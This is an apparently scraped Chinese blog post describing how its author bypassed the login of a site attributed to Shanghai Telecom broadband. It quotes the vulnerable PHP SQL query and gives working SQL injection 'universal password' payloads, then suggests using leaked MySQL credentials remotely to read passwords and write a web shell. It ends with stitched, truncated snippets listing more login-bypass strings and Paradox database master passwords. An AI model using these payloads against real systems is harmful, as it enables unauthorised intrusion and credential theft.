萬能密碼構造拿下上海電信寬頻

2022-03-28 23:38:02 字數 1168 閱讀 5896

檔案爬了一下

發現如下

如此一來,輕鬆的多啦。

看308行

$sql="select

*from cms_users where cms_username=

'$username

'and cms_userpass=

'$password

'";

根據此sql構造萬能密碼

當$username=' or '1'='1 /*

$password=hello world*/

時候該sql語句就為:"select * from cms_users where cms_username='1' or '1'='1/*and cms_userpass='hello world*/'";

"select * from cms_users where cms_username='1' or '1'='1/* and cms_userpass='hello world*/'";

"select * from cms_users where cms_username='1' or '1'='1'";

其實有一招,不知道大家想到木有。

$username=' or 1=1#

直接完美注釋後面的語句。$password可以隨便輸入。

上面的是乙個姿勢,其實還有乙個姿勢同樣可以拿下.

原始碼拿到了,有mysql密碼了.可以外聯,直接讀取密碼.找到可讀寫直接寫shell

萬能密碼 php,PHP萬能密碼

說實話如果乙個 的前台都是注入漏洞,那麼憑經驗,萬能密碼進後台的機率基本上是百分之百。可是有的人說對php的站如果是gpc魔術轉換開啟,就會對特殊符號轉義,就徹底杜絕了php注入。其實說這話的人沒有好好想過,更沒有嘗試過用萬能密碼進php的後台。其實gpc魔術轉換是否開啟對用萬能密碼進後台一點影響也...

asp aspx php jsp萬能密碼

asp aspx萬能密碼 1 or a a 2 or a a 3 or 1 1 4 or 1 1 5 a or 1 1 6 or 1 1 7 or a a 8 or a a 9 or 10 or or 11 1 or 1 1 1 12 1 or 1 1 or 1 1 13 or 1 1 00 14 ...

PARADOX DB 萬能密碼

paradox資料庫的萬能密碼 如果是paradox,請用此萬能密碼 jiggae 還有 nx66ppx 注意大小寫 version password paradox 7 jiggae or cupcdvum paradox 5 jiggae or cupcdvum paradox 4 nx66pp...